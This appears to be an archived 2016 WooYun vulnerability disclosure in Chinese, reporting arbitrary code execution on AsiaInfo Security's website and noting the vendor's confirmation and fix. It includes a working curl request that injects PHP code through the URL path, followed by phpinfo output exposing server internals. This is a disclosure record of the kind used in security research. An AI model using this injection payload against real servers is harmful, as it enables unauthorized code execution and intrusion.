乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-20: 厂商已经确认,细节仅向厂商公开 2016-01-30: 细节向核心白帽子及相关领域专家公开 2016-02-07: 厂商已经修复漏洞并主动公开,细节向公众公开
亚信安全在云安全领域市场占有率全球第一,做云安全的,做APT治理的,做防病毒的,还做威胁情报亚信安全www官方网站(www.asiainfo-sec.com)任意代码执行漏洞
#1 漏洞地址
curl "http://www.asiainfo-sec.com/index.php/module/action/param1/$%7B@print(phpinfo())%7D"
#2 漏洞证明
<table border="0" cellpadding="3" width="600"><tr><td class="e">System </td><td class="v">Linux localhost.localdomain 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 </td></tr><tr><td class="e">Build Date </td><td class="v">Jun 23 2015 21:18:22 </td></tr><tr><td class="e">Server API </td><td class="v">Apache 2.0 Handler </td></tr><tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr><tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/etc </td></tr><tr><td class="e">Loaded Configuration File </td><td class="v">/etc/php.ini </td></tr><tr><td class="e">Scan this dir for additional .ini files </td><td class="v">/etc/php.d </td></tr><tr><td class="e">Additional .ini files parsed </td><td class="v">/etc/php.d/curl.ini,/etc/php.d/fileinfo.ini,/etc/php.d/json.ini,/etc/php.d/mbstring.ini,/etc/php.d/mysql.ini,/etc/php.d/mysqli.ini,/etc/php.d/pdo.ini,/etc/php.d/pdo_mysql.ini,/etc/php.d/pdo_sqlite.ini,/etc/php.d/phar.ini,/etc/php.d/sqlite3.ini,/etc/php.d/zip.ini </td></tr><tr><td class="e">PHP API </td><td class="v">20100412 </td></tr><tr><td class="e">PHP Extension </td><td class="v">20100525 </td></tr><tr><td class="e">Zend Extension </td><td class="v">220100525 </td></tr><tr><td class="e">Zend Extension Build </td><td class="v">API220100525,NTS </td></tr><tr><td class="e">PHP Extension Build </td><td class="v">API20100525,NTS </td></tr><tr><td class="e">Debug Build </td><td class="v">no </td></tr><tr><td class="e">Thread Safety </td><td class="v">disabled </td></tr><tr><td class="e">Zend Signal Handling </td><td class="v">disabled </td></tr><tr><td class="e">Zend Memory Manager </td><td class="v">enabled </td></tr><tr><td class="e">Zend Multibyte Support </td><td class="v">provided by mbstring </td></tr><tr><td class="e">IPv6 Support </td><td class="v">enabled </td></tr><tr><td class="e">DTrace Support </td><td class="v">disabled </td></tr><tr><td class="e">Registered PHP Streams</td><td class="v">https, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip</td></tr><tr><td class="e">Registered Stream Socket Transports</td><td class="v">tcp, udp, unix, udg, ssl, sslv3, sslv2, tls</td></tr><tr><td class="e">Registered Stream Filters</td><td class="v">zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dec
<tr><td class="e">_SERVER["SERVER_SOFTWARE"]</td><td class="v">Apache/2.4.6 (CentOS) PHP/5.4.16</td></tr><tr><td class="e">_SERVER["SERVER_NAME"]</td><td class="v">www.asiainfo-sec.com</td></tr><tr><td class="e">_SERVER["SERVER_ADDR"]</td><td class="v">10.28.141.129</td></tr><tr><td class="e">_SERVER["SERVER_PORT"]</td><td class="v">80</td></tr><tr><td class="e">_SERVER["REMOTE_ADDR"]</td><td class="v">10.28.141.11</td></tr><tr><td class="e">_SERVER["DOCUMENT_ROOT"]</td><td class="v">/var/www/html/asiainfo-sec</td></tr><tr><td class="e">_SERVER["REQUEST_SCHEME"]</td><td class="v">http</td></tr><tr><td class="e">_SERVER["CONTEXT_PREFIX"]</td><td class="v"><i>no value</i></td></tr><tr><td class="e">_SERVER["CONTEXT_DOCUMENT_ROOT"]</td><td class="v">/var/www/html/asiainfo-sec</td></tr><tr><td class="e">_SERVER["SERVER_ADMIN"]</td><td class="v">root@localhost</td></tr><tr><td class="e">_SERVER["SCRIPT_FILENAME"]</td><td class="v">/var/www/html/asiainfo-sec/index.php</td></tr><tr><td class="e">_SERVER["REMOTE_PORT"]</td><td class="v">31156</td></tr><tr><td class="e">_SERVER["GATEWAY_INTERFACE"]</td><td class="v">CGI/1.1</td></tr><tr><td class="e">_SERVER["SERVER_PROTOCOL"]</td><td class="v">HTTP/1.1</td></tr><tr><td class="e">_SERVER["REQUEST_METHOD"]</td><td class="v">GET</td></tr><tr><td class="e">_SERVER["QUERY_STRING"]</td><td class="v"><i>no value</i></td></tr><tr><td class="e">_SERVER["REQUEST_URI"]</td><td class="v">/index.php/module/action/param1/$%7B@print(phpinfo())%7D</td></tr><tr><td class="e">_SERVER["SCRIPT_NAME"]</td><td class="v">/index.php</td></tr><tr><td class="e">_SERVER["PATH_INFO"]</td><td class="v">/module/action/param1/${@print(phpinfo())}</td></tr><tr><td class="e">_SERVER["PATH_TRANSLATED"]</td><td class="v">/var/www/html/asiainfo-sec/module/action/param1/${@print(phpinfo())}</td></tr><tr><td class="e">_SERVER["PHP_SELF"]</td><td class="v">/index.php/module/action/param1/${@print(phpinfo())}</td></tr><tr><td class="e">_SERVER["REQUEST_TIME_FLOAT"]</td><td class="v">1453096960.528</td></tr><tr><td class="e">_SERVER["REQUEST_TIME"]</td><td class="v">1453096960</td></tr></table><br />
更新框架
危害等级:高
漏洞Rank:15
确认时间:2016-01-20 14:23
非常感谢及时告知我们系统的潜在风险,我们将尽快解决更正。
2016-01-20:已修复
2016-02-07:确认修复漏洞并公开
